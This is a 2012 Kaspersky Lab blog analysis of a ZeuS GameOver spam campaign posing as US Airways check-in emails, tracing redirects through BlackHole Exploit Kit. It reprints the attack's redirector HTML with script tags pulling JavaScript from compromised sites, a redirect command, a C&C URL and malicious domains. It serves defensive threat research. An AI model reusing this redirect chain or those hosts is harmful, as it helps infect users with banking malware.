English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

A gift from ZeuS for passengers of US Airways

Dmitry Tarakanov
Kaspersky Lab Expert
Posted April 03, 12:58  GMT
Tags: ZeuS
0.4
 

Spam

On 20 March, we detected a spam campaign targeting passengers of US Airways. Almost the entire week cybercriminals were sending users the following email allegedly from US Airways:

There is a brief description of the check-in procedure and a confirmation code is provided for online reservation.

The criminals are obviously banking on any recipients flying on the flight mentioned in the email clicking on the link "Online reservation details".

Different emails contained different links — for example, we noticed the following domains: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.

After clicking the link a series of redirects eventually leads to a domain hosting BlackHole Exploit Kit.

BlackHole Exploit Kit: redirections and infection

A typical BlackHole infection routine is used to infect users’ computers.
The first port of call after clicking the link in the email is a page with the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>

As a result, javascripts are loaded into the user’s browser from different domains. The javascripts contain a single command such as: document.location='http://indigocellular.com/'. This command redirects the user to a page containing another, obfuscated, javascript.

This javascript’s job is to insert links into the html code of the page that then lead to the object with the exploit. So far, we’ve detected three types of objects: a JAR file, SWF file and a PDF document. Each object exploits a vulnerability in the respective application – Java, Flash Player or Adobe Reader — to execute malicious code in the targeted system. If a vulnerable version of even one of those applications is being used, the attack ends in infection – the malicious executable is loaded and run in the user’s system.

Malicious JAR, SWF and PDF documents are loaded from different domains — e.g. indigocellular.com, browncellular.com, bronzecellular.com (domains info) — under the names Qai.jar, field.swf, dea86.pdf, 11591.pdf.

We detect these exploits as:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

After successfully exploiting vulnerabilities, an executable file is downloaded from the same domains where the exploits are located. It can be downloaded under different names — about.exe, contacts.exe and others — and is essentially a downloader. When the downloader runs, it connects to its C&C at the URL “176.28.18.135/pony/gate.php”, and downloads and runs another malicious program – ZeuS/ZBot or, to be more precise, a modification of one of the development branches of that Trojan known as ‘GameOver’ – on the user’s system.

ZeuS is downloaded from hacked sites such as:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Polymorphism

At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and ZeuS — was frequently replaced with a new one. The domains remained "alive" for nearly 12 hours, while the ZeuS samples were replaced more often.

During the short periods of time (a few hours over several days) that I was monitoring what files were being downloaded, I managed to detect 6 modifications of the downloader and 3 modifications of ZeuS.

To recap, a modification includes all the samples that are detected with the same verdict, hence number of detected programs is usually bigger than the number of verdicts.

Downloader verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Total number of programs detected with these verdicts: 250.

ZeuS verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Total number of samples detected with these verdicts: 127.

As I have already mentioned, these were only the verdicts I managed to record. There were undoubtedly more modifications throughout the course of this particular spam campaign.

Botnet identificators

It wasn’t just the ZeuS wrapper that was being changed (packer, anti-emulation), the malicious program itself was being recompiled. ZeuS contains a hardcoded botnet ID string and some IP addresses which the malicious program tries to connect to following infection. Those data were modified over time as well. According to the numbers of detected and analyzed samples, we can assume that ZeuS was being recompiled at every second repacking.

Having analyzed 48 versions of the different modifications of ZeuS that were used by cybercriminals in this attack, I discovered 19 unique botnet identificators:

chinz22chinz24blk25mmz22mmz24mmz25
molotz25NR22NR23NR24NR25ppcz22
ppcz23ppcz24rnato25rubz22rubz23rubz24
zuu

In contrast to the conventional ZeuS program which usually contains a single URL to download a configuration file, each sample of GameOver has 20 hardcoded IP addresses with ports. Having infected the victim’s computer, GameOver tries to establish a connection to those addresses in order to inform a botnet about itself, retrieve information (e.g. web injects), send data stolen from the victim.

Of the 960 IP addresses contained in the 48 analyzed samples, just 157 of them are unique:

+Open list of IP addresses

Attack geography

I presume that during this time spam emails with links to confirm US Airways flight reservations were not the only method used to spread ZeuS. Cybercriminals are nothing if not original. And even though this is not the first time they’ve used a flight-related trick, it’s the first time this particular kind of spam has been detected. If the recipients belong to a target audience, they are much more likely to click on a malicious link in an email. However, the majority of users who received these emails were not flying anywhere that day, which is why very few fell for the scam.

Obviously, for the period under review other spam emails were being sent including links that led to the same sites, the same exploits and the same malicious executable files mentioned above. I took a look at where the threats that were related in some way or another to this attack were detected by our users. Below you can see a geographical breakdown of the detected exploits, downloaders and ZeuS modifications used by the cybercriminals in this attack:

Russia32.8%
USA10.3%
Italy9.2%
Germany8.6%
India6.9%
France3.8%
Ukraine3.6%
Poland3.2%
Brazil3.1%
Malaysia3%
Spain2.9%
China2.7%


P.S. Here’s some information about the domains being used in the spam campaign described above
(it’s not the first time these registration details have been used to register other domains that participate in propagating malicious software via spam):

indigocellular.com209.59.218.102
Registrant:Nicholas Guzzardi, clarelam@primasia.com
5536 Gold Rush Dr.NW
87120 Albuquerque
United States
Tel: +1.5053505497
browncellular.com174.140.168.207
Registrant:Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US
bronzecellular.com96.9.151.220
Registrant:Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US


Below you can find an excerpt of MD5-hashes of files

+Open list of MD5


1 comments

mjw

2012 Apr 03, 20:36
0
 

Ticket_American_Airlines_ID115-74-14.exe

I stumbled across MD5 (.//event_7,069,405/Ticket_American_Airlines_ID115 -74-14.exe) = 85d4c479be69dc532abb9132b4f638 16 several days ago. Based on file names, these attacks might be related. The file is upx packed and drops a VB executable. Callback is to ofalaskas14.ru (213.152.180.180). File was dropped from 194.8.253.11

Reply    
If you would like to comment on this article you must first
login


Bookmark and Share
Share

Analysis

Blog